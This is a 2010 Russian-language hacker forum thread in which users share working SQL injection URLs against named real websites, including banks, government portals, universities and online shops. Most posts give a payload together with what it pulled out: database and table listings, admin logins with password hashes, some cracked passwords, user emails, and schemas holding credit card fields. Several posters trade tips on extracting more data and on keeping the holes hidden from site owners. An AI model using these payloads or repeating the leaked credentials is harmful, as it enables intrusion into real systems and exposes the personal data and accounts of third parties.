RE: Ваши Sql-инъекции
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Ваши Sql-инъекции - 2010-04-21 20:45:50.140000
|
|
|
total90
Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666
|
http://ihscslnews.org/view_article.php?id=-283+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7 User:ihscslnews@pristina.dreamhost.com Database:ihscslnews Version:5.0.89-userstats-log PR4 http://misto.co.ua./frankivsk/ogoloshennja/ogoloshennja.php?action=show&catid=1+union+select+1,concat_ws(0x3a,user(),database(),version())-- User:dh27shdocka@localhost Database:doshka Version:5.1.42-log
http://tempstuff.murfdesigns.com/art/add_comment.php?art_id=-283+union+select+concat_ws(0x3a,user(),database(),version()),2-- User:murf@eastman.dreamhost.com Database:murfstuff Version:5.0.89-userstats-log
|
|
|
RE: Ваши Sql-инъекции - 2010-04-21 23:13:20.193333
|
|
|
total90
Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666
|
http://www.mississippipolitical.com/Mississippi/product_desc.php?id=-283+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- User:Mississippi@208.109.14.20 Database:Mississippi Version:4.0.27-max-log PR4 http://www.humus.name/index.php?page=News&ID=-283+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7-- User:slafshas@h12204@s127.loopia.se Database:humus_name Version:5.0.45-log PR4
|
|
|
RE: Ваши Sql-инъекции - 2010-04-22 08:50:12.786666
|
|
|
Bananas Papaz
Сообщений: 119
Оценки: 0
Присоединился: 2009-11-15 12:46:31.003333
|
quote:
ORIGINAL: Pashkela Напоминание-объяснение, почему рекомендуется скули писать именно в скуля , а не через quote:
скуля или вообще просто так - так сложнее найти через поиск на сайте, так реже индексируется, так сложнее выявить скулю даже великому гоголю (тем паче хозяину ресурса, с которого хотят получить гешефт), что означает, что скуля дольше проживет и сможет доставить радость большему кол-ву народа. Спасибо за внимание. Планету хекерам. http://www.google.ru/search?client=opera&rls=ru&q=mississippipolitical.com&sourceid=opera&ie=utf-8&oe=utf-8 Видимо уже не прет…
_http://onlineru.ru/?p=news&id=-1+union+select+1,column_name,3,4,5,6+from+information_schema.columns+where+table_name=char(102,111,114,117,109,95,97,99,99,101,115,115)+limit+0,1-- (ищу название полей в таблице forum_access, нахожу три поля: "userid", "forumid", "accessmask") _http://onlineru.ru/?p=news&id=-1+union+select+1,userid,3,4,5,6+from+forum_access+limit+0,1-- (теперь пытаюсь узнать содержимое этих полей, а в результате ничего!) Помогите!!!
|
|
|
RE: Ваши Sql-инъекции - 2010-04-22 09:59:07.810000
|
|
|
RadikalEdward
Сообщений: 22
Оценки: 0
Присоединился: 2010-04-18 19:46:40.860000
|
попробуй aes_decrypt(aes_crypt(user_id,0x71),0x71) что то типо этого может дело в limit+0,1 измени его limit+1,1 limit+2,1 итд
|
|
|
RE: Ваши Sql-инъекции - 2010-04-22 17:53:15.263333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.equitybank.co.ke/service.php?subcat=999+union+select+concat(username,0x3a,psswd,version())+from+users Kiprop.Korir:7cdfa983173cd3233949f84e059f10a0[sm=bg.gif]
|
|
|
RE: Ваши Sql-инъекции - 2010-04-22 17:57:20.396666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
https://www.capaus.org/view_news.php?id=-12+union+select+0,1,2,concat%28@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29,4-- https://www.capaus.org/view_news.php?id=-12+union+select+0,1,2,concat%28user_name,0x3a,email,0x3a,password%29,4+from+users-- Server: Microsoft-IIS/6.0 Version: 5.0.45-community-nt Powered by: PHP/4.4.7,PleskWin,ASP.NET Database: capa_db Database:
information_schema
capa_db
test
Tables:capa_db
documents
event_photos
event_photos_pictures
events
mail_tester
member_specialty
members
messages
news
send_history
templates
users
Columns: members
status
member_type
expirationdate
member_name
password
email
chinese_name
first_name
last_name
address
address_two
city
state
postcode
home_phone
business_phone
mobile
upload_picture
bio
company
position
degree
undergraduate_school
undergraduate_major
undergraduate_year
graduate_school
graduate_major
graduate_year
create_date
modification_date
payment_method
renew
renew_type [sm=br.gif]
|
|
|
RE: Ваши Sql-инъекции - 2010-04-22 19:55:15.443333
|
|
|
total90
Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666
|
gov.ua: http://www.shevruo.da-kyiv.gov.ua/index.php?w=infoarchive&id=-283+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6--&search= User:shevadm@localhost Database:shevr_ruo Version:5.1.44 http://www.sobes-ter.gov.ua/index.php?cat=news&id=-283+union+select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12-- User:user@localhost Database:www Version:4.1.22-community-nt
|
|
|
RE: Ваши Sql-инъекции - 2010-04-22 20:31:07.253333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://showatelier.ru/?mod=SiteNews&act=2&news_id=-1+and+1=0+Union+Select+concat%28@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29,null-- Server:Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Version: 5.0.89-community User: showatel_base@localhost Database: showatel_base1/showatel_base/information_schema
Database:showatel_base1
Tables:
ssp_Account
ssp_AdminSet Columns: login:PASSWORD
ssp_Answers
ssp_Articles
ssp_ArticlesGoods
ssp_ArticlesTree
ssp_ArticlesTreeCache
ssp_Auth
ssp_Backup
ssp_Banner
ssp_BannerPage
ssp_BannerSet
ssp_Catalogs
ssp_Country
ssp_CtAccess
ssp_Curort
ssp_Designs
ssp_DesktopsPages
ssp_DesktopsPagesTree
ssp_DesktopsPagesTreeCache
ssp_Discounts
ssp_FAQ
ssp_FAQTree
ssp_FAQTreeCache
ssp_Files
ssp_FilesTree
ssp_FilesTreeCache
ssp_FormResutls
ssp_FormResutlsData
ssp_Goods
ssp_GoodsPrices
ssp_GoodsProperties
ssp_GoodsPropertiesValues
ssp_GoodsTree
ssp_GoodsTreeCache
ssp_Guest
ssp_GuestDiscount
ssp_HelpClient
ssp_Hotel
ssp_ImageContainer
ssp_ImageTables
ssp_ImagesInsideTable
ssp_Language
ssp_License
ssp_Links
ssp_LinksTree
ssp_LinksTreeCache
ssp_Materials
ssp_MaterialsTree
ssp_MaterialsTreeCache
ssp_ModAccess
ssp_ModuleProperties
ssp_Modules
ssp_News
ssp_NewsArticles
ssp_NewsComments
ssp_NewsFiles
ssp_NewsGoods
ssp_NewsSend
ssp_NewsSendGroup
ssp_NewsSendLink
ssp_PhotoPages
ssp_PhotoPagesTree
ssp_PhotoPagesTreeCache
ssp_Picts
ssp_PictsInsideTable
ssp_Props
ssp_Questions
ssp_Realty
ssp_RealtyFormResutls
ssp_RealtyFormResutlsData
ssp_RealtyGuest
ssp_RealtyPrices
ssp_RealtyProperties
ssp_RealtyPropertiesValues
ssp_RealtyTree
ssp_RealtyTreeCache
ssp_RealtyZakaz
ssp_SiteMailBoxes
ssp_Spr
ssp_SprData
ssp_StatRemoteUsers
ssp_StatSEKeyWords
ssp_StatURLCounters
ssp_Templates
ssp_TemplatesCache
ssp_TemplatesReserve
ssp_TemplatesReserveCache
ssp_Terms
ssp_Tour
ssp_TourApartments
ssp_TourFoodTypes
ssp_TourGroup
ssp_TourGroups
ssp_TourHotelTypes
ssp_TourPrice
ssp_Tour_Zakaz
ssp_Uploads
ssp_Valute
ssp_VotesLog
ssp_WinFormat
ssp_Zakaz
ssp_ZakazGoods
ssp_ZakazTours 29784de1efce4270df86e42900ebaf2b:aac9d85a21d16d8d1 0d1a105e15d2dc6 cracked[sm=dont.gif] Admin:showatelier.ru:210436046
|
|
|
RE: Ваши Sql-инъекции - 2010-04-23 10:49:45.140000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.greenbergresearch.com/index.php?ID=-999.9 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,%String_Col%,14-- http://www.sytec.com.vn/page.php?type=about&id=-7%20union%20select%201,unhex%28hex%28concat%28user_name,char%2858%29,user_password%29%29%29,3,4,5,6,7,8%20from%20tbl_user--
|
|
|
RE: Ваши Sql-инъекции - 2010-04-23 10:59:49.993333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: Alex.Black http://www.ac-psych.org/index.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())/* User: lacp_ac-psych@81.2.203.24 Database: acpsych_ac-psych Version: 5.0.33-log quote:
http://www.ac-psych.org/index.php?id=-1+union+select+concat_ws(0x3a,version(),user(),database())/*
artykuly
artykuly_test
artykulyspecial
artykulyspecial_test
menu
menu_nowe
menu_nowe_anita
menu_nowe_test
specialissue
specialissue_test
specjalizacje
subscribe
subsribe_test
uploadfile
uploadfile_test
|
|
|
RE: Ваши Sql-инъекции - 2010-04-23 15:55:53.120000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: neesooR sql - иньекция. на шоп есть ? пример хочу посмотреть.
http://www.netmarket.pl/pole/enasp/is.pi.asp?pid=119%20and%281%29=convert%28int,@@version%29--
Server: Microsoft-IIS/6.0 Version: Microsoft SQL Server 2000 - 8.00.2055 (Intel X86) Dec 16 2008 19:46:53 Copyright © 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Dodatek Service Pack 2) User: butikcli Database: butik Database:
butik
master
tempdb
model
msdb
pubs
Northwind
argent
bkstore
butik
Tables:butik
Orders
OrdersPositions
authkey
authkey
authkey
authkey
Clients
clilgn
cliolgn
CompView
dtproperties
foofoofoo
onet
onetpos
Orders
OrdersPositions
Products
relbutik
sOrders
sOrdersPositions
sysconstraints
syssegments
t_jiaozhu
tbColors
tbSize
xtest
Columns: Clients
CID
clName
Email
Pass
Tel
Address
ZIP
City
clDate
NIP
Transfer
Zap
Login
Company
DeliveryAddr
fname
emcn
emnew
post
adra
clpd
|
|
|
RE: Ваши Sql-инъекции - 2010-04-23 22:57:19.640000
|
|
|
total90
Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666
|
milegyek.hu http://www.milegyek.hu/open.php?id=-283+union+select+1,2,3,user(),version(),database(),7,8,9,10,11,12,13,14-- User:saldoweb@localhost Database:milegyek_hu Version:5.1.37-1ubuntu5.1 PR5 ukrfoto.dp.ua http://ukrfoto.dp.ua/download.php?id=283+union+select+1,2,3,4,5,concat_ws(0x3a,user(),database(),version())-- User:saldoweb@localhost Database:ukrfoto_dp Version:4.1.25 dnsteel.com.ua http://dnsteel.com.ua/index.php?id=-283+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9-- User:dnsteel@localhost Database:dnsteel Version:5.0.86
|
|
|
RE: Ваши Sql-инъекции - 2010-04-24 13:30:12.140000
|
|
|
total90
Сообщений: 15
Оценки: 0
Присоединился: 2009-09-03 19:11:39.676666
|
telspravka.com http://ustilimsk.telspravka.com/fam.php?id=-283+union+select+1,concat_ws(0x3a,user(),database(),version())-- User: u_telspravka@localhost Database: telspravka Version: 4.1.22-log yp.md http://www.yp.md/news2/news.php?id=-283+union+Select+1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9,10,11,12,13-- User: ypmd_tester@localhost Database: ypmd_test Version: 5.0.90-community-log
|
|
|
RE: Ваши Sql-инъекции - 2010-04-24 18:09:53.160000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.socialistworker.co.uk/sw_comment.php?id=4966+union+select+version(),2,3,4/*
|
|
|
RE: Ваши Sql-инъекции - 2010-04-25 06:28:15.213333
|
|
|
demonru
Сообщений: 1073
Оценки: 0
Присоединился: 2009-02-15 14:18:59.626666
|
Ну и от меня тогда:
http://www.designbyjude.com/gallery_detail.php?id=7+and+1=0+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5--
5.0.51a-3ubuntu5.4:jude@116.240.206.16:designbyjude
|
|
|
RE: Ваши Sql-инъекции - 2010-04-25 16:54:17.373333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
а вот и я: http://www.silkcutlino.com/product_details.php?id=46+and+1=0+Union+Select+1,2,3,4,5,6,concat%28@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29,8,9,10,11,12-- Version 5.0.51a-24+lenny2
Database:shop_silkcutlino_com
Table:
itemdetails
orderdetails
tbl_postage
tbl_products
tbl_users
Column: orderdetails
cart_id
bname
baddress
bcity
bstate
bzip
bcountry
bphone
bmobile
bemail
heard
sname
saddress
scity
sstate
szip
scountry
sphone
smobile
semail
sdate
transaction_no
cc_number
cc_name
cc_type
cc_expiry
bank_ref
responce_text
responce_code
settlement_date
status
total_price
ord_status
payment_mode
Database : shop_silkcutlino_com
Table: tbl_users
есть и логин:пасс админа но это уже другая история……..
|
|
|
RE: Ваши Sql-инъекции - 2010-04-26 12:59:08.860000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://yelianghow.com.sg/menu.asp?catID=2&setCourseID=26%20and%281%29=convert%28int,@@version%29-- Server: Microsoft-IIS/6.0 Version: 4.0.20a-nt User: yelianghow_db_1@orion2.iwi.com.sg Database: yelianghow_db_1
|
|
|
RE: Ваши Sql-инъекции - 2010-05-03 10:55:26.610000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.tup.edu.ph/news.php?id=-8+union+select+1,2,concat%28@@version,0x3a,user%28%29,0x3a,database%28%29,0x3a,@@version_compile_os%29,0x494E43,5,6,7,8,9,10,11-- Server: Apache/2.0.59 (Win32) PHP/5.2.0 Version: 5.0.27-community-nt User: root@localhost Database: tupcms http://www.tup.edu.ph/news.php?id=-8+union+select+1,2,concat_ws%280x3a,user,password,file_priv%29,0x494E43,5,6,7,8,9,10,11+FROM+mysql.user-- Database : mysql Table : user User:Password root:*928C134CB0407115717358FBC0A03FC76E896FE0 Database:
information_schema
mysql
phpmyadmin
test
tupcms
tupwebforum
Tables: tupwebforum
tupauth_access
tupbanlist
tupcategories
tupconfig
tupconfirm
tupdisallow
tupforum_prune
tupforums
tupgroups
tupposts
tupposts_text
tupprivmsgs
tupprivmsgs_text
tupranks
tupsearch_results
tupsearch_wordlist
tupsearch_wordmatch
tupsessions
tupsessions_keys
tupshout
tupshoutbox
tupsmilies
tuptextual_confirmation
tupthemes
tupthemes_name
tuptopics
tuptopics_watch
tupuser_group
tupusers
tupvote_desc
tupvote_results
tupvote_voters
tupwords
Column: tupusers
user_active
username
user_password
user_session_time
user_session_page
user_lastvisit
user_regdate
user_level
user_posts
user_timezone
user_style
user_lang
user_dateformat
user_new_privmsg
user_unread_privmsg
user_last_privmsg
user_emailtime
user_viewemail
user_attachsig
user_allowhtml
user_allowbbcode
user_allowsmile
user_allowavatar
user_allow_pm
user_allow_viewonline
user_notify
user_notify_pm
user_popup_pm
user_rank
user_avatar
user_avatar_type
user_email
user_icq
user_website
user_from
user_sig
user_sig_bbcode_uid
user_aim
user_yim
user_msnm
user_occ
user_interests
user_actkey
user_newpasswd
user_login_tries
user_last_login_try Table : tupusers
username:user_password:user_email
webadmin:3adfb823b6e672d5e26a899f1adf099e:ccccc@yahoo.com
[b]Сracked: 3adfb823b6e672d5e26a899f1adf099e:341651[/b]
the KG:0d7b9a697697567f2afb00cdba129355:krisgeneral@ya hoo.com
Fprosario:cd1b50533bb70b5cb49e8a54d3d39933:mah_bab y_ellaine_and_cyndi@yahoo.com
angecarlsison:937c52d94b43e5c3fafc48be43d15cdc:ang ecarlsison@yahoo.com
R.Tanala:e62d69123e9c6126bdcddb612d1ec74f:tanala_r izza@yahoo.com
tidehunter:111132ae44e75c3eae89127061a78b34:rperal ta_0414@yahoo.com
ayhie29:d8344905e23da5b9374733e882c4867e:armarceli no29@yahoo.com
shook2kill:351f3a4b1a413bdb69070cf21955740f:shook2 kill@yahoo.com
ennario:14d1bc92479bbd560362b9709e3689e4:great_lov er26@yahoo.com
Всего 1460
|
|
|
RE: Ваши Sql-инъекции - 2010-05-04 10:57:00.236666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.blogforacure.com/frontend/calendars/event.php?event_id=null%20UNION%20SELECT%201,2,3,4,5,6,0x494E43,CONCAT_WS%28CHAR%2832,58,32%29,user%28%29,database%28%29,version%28%29%29,9,10,11,12,13,14,15,16,17-- blogforacure2@localhost : blogforacure2 : 4.1.20
|
|
|
RE: Ваши Sql-инъекции - 2010-05-05 08:58:50.430000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.frentanarent.it/sezioni.php?titolo=news&id=-1+union+select+1,concat_ws%280x3a,user,psw%29,3,4,5,6+from+admin-- novatekservices:8969b7ea1adcc630297ea9280bb01fdb http://www.frentanarent.it/admin.php Database : frentanarent Table : admin user:psw:email: novatekservices:8969b7ea1adcc630297ea9280bb01fdb:i nfo@nova-tek.it admin:87811474a57f9e2edf03c76155c4ba57:frentana.re nt@virgilio.it
|
|
|
RE: Ваши Sql-инъекции - 2010-05-06 19:43:25.886666
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
http://www.nbg.gov.ge/index.php?m=339&year=2001'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand( 0)*2))+from+information_schema.tables+group+by+2)a)–+ а как составить запрос что бы просмотреть column_name ?
|
|
|
RE: Ваши Sql-инъекции - 2010-05-07 06:27:35.126666
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
http://www.nbg.gov.ge/index.php?m=339&year=2001'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand( 0)*2))+from+information_schema.tables+group+by+2)a)–+ а как составить запрос что бы просмотреть column_name ?
|
|
|
RE: Ваши Sql-инъекции - 2010-05-11 23:33:55.583333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.fiacona.org/category_index.php?catid=-95%27+union+select+1,2,concat_ws%280x3a,table_name,column_name%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns--%20and%20%271%27=%272 5.0.89-community http://www.detachmenttheory.com/e107_plugins/image_gallery/image_gallery.php?page=image-detail&album=1&image=-9999+UNION+SELECT+concat_ws%28char%2858%29,user_name,user_password%29+from+e107_user+where+user_id=1--
[link=http://lapaz.gob.mx/sistema/mostrar/uploads/upload.php?id=-1/**/UNION/**/SELECT/**/NULL,0,concat_ws%280x3a,login,password%29,1,2,3/**/FROM/**/usuarios/**/limit/**/0,1--]http://lapaz.gob.mx/sistema/mostrar/uploads/upload.php?id=-1/**/UNION/**/SELECT/**/NULL,0,concat_ws%280x3a,login,password%29,1,2,3/**/FROM/**/usuarios/**/limit/**/0,1--[/link]
Десерт[sm=bq.gif]http://www.magicsphere.net/?page=23&menu=1&id=-76+union+select+concat_ws%28username,user_password,user_email%29,2,3+from+phpbb_users-- Server = Apache/2.2.X (OVH) Version = 4.0.26-standard-log Powered by = PHP/4.4.9 User = magicsphcartes@10.0.62.30 Database = magicsphcartes Tables:phpbb_users phpbb_users Columns: Table phpbb_users username user_email user_icq user_id user_level user_password
|
|
|
RE: Ваши Sql-инъекции - 2010-05-12 10:04:35.580000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.sillybillies.com.au/page.php?id=-14%20union%20all%20select%201,2,concat_ws%280x2B,username,password%20%29,4%20from%20settings-- http://www.rockiurbanfitness.com.au/trainers.php?id=-8+union+select+0,1,2,3,concat_ws%280x3a,fname,lname,pwd%29+from+trainers-- спец. для шопоголиков[sm=dont.gif] http://www.wordwellbooks.com/book.php?id=-394+union+select+1,2,3,5,4,Credit_Card_Number,7,8,9,concat_ws%28Credit_Card_Type,Exp_Month,Exp_Year%29,11,12,13,14,15+from+Orders--
Database:wwbooksdb
information_schema
wwbooksdb
Tables:Orders
Orders
Publishers
_sessions
_users
test
Columns: Table Orders
__owner_id
__ctime
__mtime
__md5
Salutation
First_Name
Middle_Initial
Last_Name
eMail_Address
Street_Address
CityTown
StateCounty
Zip
Country
Daytime_Phone
Evening_Phone
Daytime_Fax
Evening_Fax
Credit_Card_Type
Exp_Month
Exp_Year
Credit_Card_Number
Order_ID
Total
Products_Ordered
Status
Shipping
Shipping_Method
Tax
DeliveryStreet_Address
DeliveryCityTown
DeliveryStateCounty
DeliveryZip
DeliveryCountry
DeliverySalutation
DeliveryFirst_Name
DeliveryMiddle_Initial
DeliveryLast_Name
DeliveryPhone
…и ещё один подарок шопоголикам
https://www.rucksack-center.de/shop/index.php?static=modules/shop/templates/misc/show_detail_image.html&clean=yes&title=cowgirl&nummer=-000
[b]Host IP: 85.13.156.142
Web Server: Apache
Powered-by: Contentpapst 3.5.0
DB Server: MySQL >=5
Current DB: v129429
Data Bases: information_schema
v129429[/b]
|
|
|
RE: Ваши Sql-инъекции - 2010-05-13 09:14:16.556666
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
http://www.wordwellbooks.com офигенный шоп прям , актуальный картон за 2002 год , супер,нафиг такую чушь выкладывать?
|
|
|
RE: Ваши Sql-инъекции - 2010-05-13 11:34:08.486666
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
quote:
ORIGINAL: reigan http://www.wordwellbooks.com офигенный шоп прям , актуальный картон за 2002 год , супер,нафиг такую чушь выкладывать? [sm=offtopic.gif][sm=poster_ban.gif] ну а теперь по теме: http://www.sillybillies.com.au/page.php?id=-14%20union%20all%20select%201,2,concat_ws%280x2B,username,password%20%29,4%20from%20settings--
http://www.rockiurbanfitness.com.au/trainers.php?id=-8+union+select+0,1,2,3,concat_ws%280x3a,fname,lname,pwd%29+from+trainers--
http://www.phpstreet.com/winxp.php?id=-1+union+select+0,concat_ws%280x3a,gid,gname,gpwd,gmail%29,2+from+sp_gbook--
http://ytuongdesign.com.vn/index.php?m=product&act=detail&pid=7&id=null+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws%280x3a,user_id,user_password%29,14+from+tbl_user--
|
|
|
RE: Ваши Sql-инъекции - 2010-05-13 15:09:08.570000
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
В этих сайта полезной информации никакой(((((
|
|
|
RE: Ваши Sql-инъекции - 2010-05-13 15:12:14.290000
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
Кому может нужно будет. Некоторые не мои. http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.tables+limit+25,2– http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information.columns+where+table_name=0x7573657273 http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=0x7573657273 http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,concat_ws(0x3a,firstname,surname,email,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users– http://www.fowlgreenfarm.co.uk/seeanddo_detail.php?id=3+and+1=0+union+select+1,concat_ws(0x3a,firstname,surname,email,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+users– http://gambia.gtbank.com/news.php?id=7+and+1=0+union+select+1,concat_ws(0x3a,id,username,password),3,4,5+from+users– банк c5343eb49c26d286670bb0a44604d67b = tre$pass http://www.nbg.gov.ge/index.php?m=339&year=2001'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)–+ http://www.hibbett.com/categories.php?id=7+and+1=0+union+select+1,2,3,4,5,table_name+from+information_schema.tables– http://www.globalideasbank.org/site/store/detail.php?articleId=43+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)–+ http://www.globalideasbank.org/site/store/detail.php?articleId=43+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+53,1),floor(rand(%20%20%200)*2))+from+information_schema.tables+group+by+2)a)–+ http://www.pc-shop.kz/index.php?c_id=usb-flash'+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)–+ http://www.rucksack-center.de/shop/index.php?static=modules/shop/templates/misc/show_detail_image.html&clean=yes&title=cowgirl&nummer=-1{SQLINJ} http://www.pc-shop.kz/index.php?c_id=usb-flash'+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)–+ http://shop.megabug.co.uk/products.php?cat=96+and+(select+1+from+(select+count(0),concat((select+table_name+from+information_schema.tables+limit+21,1),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)–+ http://www.fiacona.org/category_index.php?catid=-95%27+union+select+1,2,concat_ws%280x3a,table_name,column_name%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+information_schema.columns–%20and%20%271%27=%272
|
|
|
RE: Ваши Sql-инъекции - 2010-05-13 15:14:17.726666
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
http://www.kcell.kz/ru/?l=archiv&a=show&id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+ws_activv%00 http://www.kcell.kz/ru/?l=archiv&a=show&id=-1+union+select+1,2,3,4,5,%20%20%206,7,8,9,10+from+services.asp http://crystalclub.kz/items/?id=1+order+by+5/* кто раскрутит ? поделетись инфой)))))))
|
|
|
RE: Ваши Sql-инъекции - 2010-05-13 16:17:04.193333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
http://crystalclub.kz/items/?id=@@version
Больше там ничего особенного не сделаешь, т.к. GET-запрос обрезается (ограничение по длине)
|
|
|
RE: Ваши Sql-инъекции - 2010-05-13 16:31:39.390000
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
мне больше интерисует это сайт http://www.kcell.kz/ru/?l=archiv&a=show&id=-1+union+select+1,2,3,4,5,%20%20%206,7,8,9,10+from+services.asp
|
|
|
RE: Ваши Sql-инъекции - 2010-05-13 16:37:16.920000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
quote:
ORIGINAL: reigan мне больше интерисует это сайт http://www.kcell.kz/ru/?l=archiv&a=show&id=-1+union+select+1,2,3,4,5,%20%20%206,7,8,9,10+from+services.asp как бы понятно: quote:
GSM Казахстан/Kcell входит в состав крупнейшего скандинавского телекоммуникационного холдинга TeliaSonera, 49% компании принадлежит АО "Казахтелеком". Лучше сразу МТС или Билайн попробуй
|
|
|
RE: Ваши Sql-инъекции - 2010-05-14 15:03:24.153333
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
http://www.sisonlgu.gov.ph/announce.php?id=-999.9 UNION ALL SELECT 1,%String_Col%,3,4-- 2reigan, может хватит флудить и посты набивать. Сам ставишь чёрти что и на других бочку катишь…
Target: http://www.kcell.kz/ru/?l=archiv&a=show&id=-1
Host IP: 195.47.255.122
Web Server: Microsoft-IIS/6.0
Powered-by: ASP.NET
DB Server: MSAccess
Web Root: c:\windows\system32\inetsrv\
Drive: a: (Drive error! maybe it's CD-ROM)
c:
d: (Drive error! maybe it's CD-ROM)
|
|
|
RE: Ваши Sql-инъекции - 2010-05-15 11:57:51.153333
|
|
|
reigan
Сообщений: 48
Оценки: 0
Присоединился: 2009-03-23 17:21:58.596666
|
sepo. 1.Ты сильно умничаешь. 2.От тебя постоянно древние сайты уезвимости с 2000 годов и сайты такие с 2000 - 2003 заброшеные , неразу свежего сайта за 2010 год небыло.
|
|
|
RE: Ваши Sql-инъекции - 2010-05-15 14:10:04.380000
|
|
|
sepo
Сообщений: 434
Оценки: 10
Присоединился: 2009-01-13 21:19:09.150000
|
